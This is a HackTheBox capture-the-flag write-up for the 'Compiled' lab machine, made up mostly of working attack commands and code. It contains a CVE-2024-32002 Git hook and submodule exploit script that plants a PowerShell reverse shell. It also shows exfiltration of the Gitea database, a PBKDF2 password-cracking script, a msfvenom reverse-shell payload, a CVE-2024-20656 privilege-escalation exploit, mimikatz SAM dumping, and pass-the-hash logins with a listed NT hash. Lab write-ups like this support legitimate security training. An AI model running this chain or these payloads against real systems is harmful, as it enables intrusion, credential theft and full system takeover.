HackTheBox Compiled Writeup

Explore the fundamentals of cybersecurity in the Compiled Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.11.26 compiled.htb gitea.compiled.htb

Script to add hosts automatically#

ip="10.10.11.26"
domain="compiled.htb gitea.compiled.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV compiled.htb -Pn

Nmap scan report for compiled.htb (10.10.11.26)
Host is up (0.054s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
3000/tcp open  http    Golang net/http server
|_http-title: Git
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=31c854f3a734915f; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=2xuqMqBgGeGjFPHtQCYnt6Ghrsk6MTcyOTExNDEyNjU1ODA4NDAwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 16 Oct 2024 21:28:46 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=ea209cdbd9920f02; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=6sE1XXq7sbKb7BO4wvKSpHg3EXc6MTcyOTExNDEyNjc5Njk0MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 16 Oct 2024 21:28:46 GMT
|_    Content-Length: 0
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Compiled - Code Compiling Services
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=10/16%Time=6710300E%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,3000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control
SF::\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCont
SF:ent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea
SF:=31c854f3a734915f;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cooki
SF:e:\x20_csrf=2xuqMqBgGeGjFPHtQCYnt6Ghrsk6MTcyOTExNDEyNjU1ODA4NDAwMA;\x20
SF:Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Optio
SF:ns:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2016\x20Oct\x202024\x2021:28:46\x20
SF:GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme
SF:-arc-green\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=
SF:device-width,\x20initial-scale=1\">\n\t<title>Git</title>\n\t<link\x20r
SF:el=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoiR2l0
SF:Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWx
SF:lZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLm
SF:h0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6Z
SF:XMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA"
SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allow
SF:ed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age=0,\x
SF:20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i_like
SF:_gitea=ea209cdbd9920f02;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet
SF:-Cookie:\x20_csrf=6sE1XXq7sbKb7BO4wvKSpHg3EXc6MTcyOTExNDEyNjc5Njk0MDIwM
SF:A;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame
SF:-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2016\x20Oct\x202024\x2021:28:
SF:46\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploit the Gitea Instance (CVE-2024-32002)#

Exploring Gitea Repositories#

Go to the Gitea explore page to browse repositories:
- URL: http://gitea.compiled.htb:3000/explore/repos
Specifically, navigate to Richard’s repository:
- URL: http://gitea.compiled.htb:3000/richard/Calculator

Project Overview: “Compiled”#

The “Compiled” project introduces a one-stop solution for compiling C++, C#, and .NET projects. It allows users to input GitHub repository URLs and get the projects compiled easily on http://localhost:5000 (if hosting locally).

Checking Git Version for Exploit#

On Richard’s system, we see that git version 2.45.0.windows.1 is installed:
```
C:\Users\Richard> git --version
git version 2.45.0.windows.1
```
Searching for vulnerabilities related to this version reveals CVE-2024-32002, which is exploitable in this environment.

Targeting the Compiled Repository#

The interesting repository to target is:
- URL: http://gitea.compiled.htb:3000/richard/Compiled

Reverse Shell Setup#

Start a listener on your machine:
```
nc -lvnp 9001
```

Register a New Gitea Account#

Go to the Gitea registration page to create a new user:
- URL: http://gitea.compiled.htb:3000
Register a user with the name pwn. After registration, get your access token from your account settings.

Create Hook Repositories#

Once logged in, create two new repositories named repo1 and repo2 using the Gitea web interface.

Prepare the Reverse Shell Payload#

Use RevShells to generate a reverse shell payload for Windows:
- URL: https://www.revshells.com/
Select Powershell #3 (base64) as the reverse shell.
After generating the payload, copy the base64-encoded reverse shell command and prepare to paste it into your hook scripts.

Inject the Reverse Shell into Git Hooks#

#!/bin/bash

git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf repo1
rm -rf repo2

git clone http://gitea.compiled.htb:3000/pwn/repo1.git
cd repo1
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGwA...
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..

pwn_repo_path=""
git clone http://gitea.compiled.htb:3000/pwn/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/pwn/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
cd ..

Exploiting Gitea and Extracting Credentials#

Navigating to the Compiled Service#

First, access the Compiled service on the target machine by navigating to:
- http://compiled.htb:5000/
In the input field of the Compiled service, paste the URL for your malicious Gitea repository:
- http://gitea.compiled.htb:3000/pwn/repo2.git
This will trigger the execution of your repository’s malicious hook scripts.

Serving Files from the Attacked Machine#

On the attacked machine, set up a simple HTTP server using Python to share files:

cd C:\
python -m http.server

This will start a server on the attacked machine, making its files available for download.

Downloading the Gitea Database to Your Local Machine#

On your local machine, download the Gitea database file from the attacked machine. Use wget to pull the gitea.db file from the target:

wget 'http://10.10.11.26:8000/Program Files/Gitea/data/gitea.db'

Here, 10.10.11.26 is the IP of the attacked machine, and 8000 is the port number of the Python HTTP server you set up.

Extracting Credentials from Gitea Database#

Once you have the gitea.db file on your local machine, use sqlite3 to open the database and extract user credentials:

sqlite3 gitea.db

Within the SQLite shell, run the following SQL query to list the emails, hashed passwords, and salts of users:

SELECT email, passwd, salt FROM user;

This will display the sensitive credential information stored in the Gitea instance.

import hashlib
import binascii
from pwn import log

salt  = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
key   = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' 
dklen = 50
iterations = 50000

def hash(password, salt, iterations, dklen):
    hashValue = hashlib.pbkdf2_hmac(
        hash_name='sha256', 
        password=password, 
        salt=salt, 
        iterations=iterations, 
        dklen=dklen,
        )
    return hashValue

dict = '/usr/share/dict/rockyou.txt'
bar  = log.progress('Cracking PBKDF2')
with open(dict, 'r', encoding='utf-8') as f:
    for line in f:
        password  = line.strip().encode('utf-8') 
        hashValue = hash(password, salt, iterations, dklen)
        target    = binascii.unhexlify(key)
        bar.status(f'Trying: {password}, hash: {hashValue}')
        if hashValue == target:
            bar.success(f'Found password: {password}!')
            break
        
    bar.failure('Hash is not crackable.')

evil-winrm -i compiled.htb -u Emily -p 12345678

more C:\Users\Emily\Desktop\user.txt

CVE-2024-20656 (VSStandardCollectorService150)#

In your local machine:

wget https://raw.githubusercontent.com/charlesgargasson/CVE-2024-20656/refs/heads/main/Expl.exe
wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
unzip RunasCs.zip
rm -rf RunasCs_net2.exe
ip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
msfvenom -p windows/shell_reverse_tcp LHOST="$ip" LPORT=9005 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
msfconsole -qx "use exploit/multi/handler; set LHOST $ip; set LPORT 9005; run"

Host downloaded file:

python -m http.server

evil-winrm -i compiled.htb -u Emily -p 12345678

mkdir c:\exploit
wget <vpn-ip>:8000/RunasCs.exe -O c:\exploit\RunasCs.exe
wget <vpn-ip>:8000/Expl.exe -O c:\exploit\Expl.exe
wget <vpn-ip>:8000/payload.exe -O c:\exploit\payload.exe
c:\exploit\RunasCs.exe emily 12345678 c:\exploit\Expl.exe

Once the listener on port 9005 responds, proceed to obtain the flag.

type \users\administrator\desktop\root.txt

Extract Admin NT Hash#

Set Up Mimikatz#

Download, extract, and run Mimikatz to obtain the NT hash:

curl http://<vpn-ip>:8000/mimikatz.zip -o m.zip && tar -xf m.zip
cd mimikatz
.\mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

Note down the NTLM hash of the Administrator.

Initiate Evil-WinRM Session#

Utilize the extracted NT hash to access the target system:

evil-winrm -i 10.10.11.26 -u administrator -H f75c95bc9312632edec46b607938061e